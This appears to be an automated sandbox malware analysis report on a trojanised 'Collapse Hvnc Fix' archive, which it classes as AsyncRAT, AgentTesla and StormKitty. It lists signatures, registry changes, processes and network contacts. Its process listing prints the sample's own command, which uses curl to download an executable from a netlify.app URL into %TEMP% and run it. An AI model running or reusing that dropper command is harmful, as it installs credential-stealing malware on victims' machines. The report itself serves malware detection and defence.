Malware Analysis Report

2025-01-03 06:30

Sample ID 230923-ss7mlsgg7x
Target Collapse Hvnc Fix.zip
SHA256 d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087
Tags
rat asyncrat agenttesla stormkitty s keylogger spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d3627b91410ec6ecfab993fb446ecabe7a77186707fb3e454a956a9cc1bad087

Threat Level: Known bad

The file Collapse Hvnc Fix.zip was found to be: Known bad.

Malicious Activity Summary

rat asyncrat agenttesla stormkitty s keylogger spyware stealer trojan

Agenttesla family

AsyncRat

Async RAT payload

StormKitty payload

Stormkitty family

AgentTesla

Asyncrat family

AgentTesla payload

Async RAT payload

AgentTesla payload

Executes dropped EXE

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Modifies Internet Explorer settings

Enumerates system info in registry

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-09-23 15:25

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-23 15:24

Reported

2023-09-23 15:43

Platform

win10v2004-20230915-en

Max time kernel

150s

Max time network

157s

Command Line

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

AsyncRat

rat asyncrat

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\Client.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\Desktop\Client.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 3a002e803accbfb42cdb4c42b0297fe99a87c641260001002600efbe110000007b7dda1e9be7d901c0393f219be7d9018e5da6239be7d90114000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\Client.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1152 wrote to memory of 936 N/A C:\Users\Admin\Desktop\Client.exe C:\Windows\System32\cmd.exe
PID 1152 wrote to memory of 936 N/A C:\Users\Admin\Desktop\Client.exe C:\Windows\System32\cmd.exe
PID 936 wrote to memory of 3984 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe
PID 936 wrote to memory of 3984 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\curl.exe

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix.zip"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\" -spe -an -ai#7zMap28299:114:7zEvent17349

C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe

"C:\Users\Admin\AppData\Local\Temp\Collapse Hvnc Fix\RAT\Collapse.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\Client.exe

"C:\Users\Admin\Desktop\Client.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe > "%TEMP%\aspnet_compiler.exe" & start /min "" "%TEMP%\aspnet_compiler.exe"

C:\Windows\system32\curl.exe

curl -L --silent https://beautiful-genie-43cd26.netlify.app/assets/files/installer/ds.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 keyauth.win udp
US 172.67.72.57:443 keyauth.win tcp
US 8.8.8.8:53 57.72.67.172.in-addr.arpa udp
US 8.8.8.8:53 beautiful-genie-43cd26.netlify.app udp
US 44.217.161.11:443 beautiful-genie-43cd26.netlify.app tcp
US 8.8.8.8:53 11.161.217.44.in-addr.arpa udp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:5552 tcp

Files

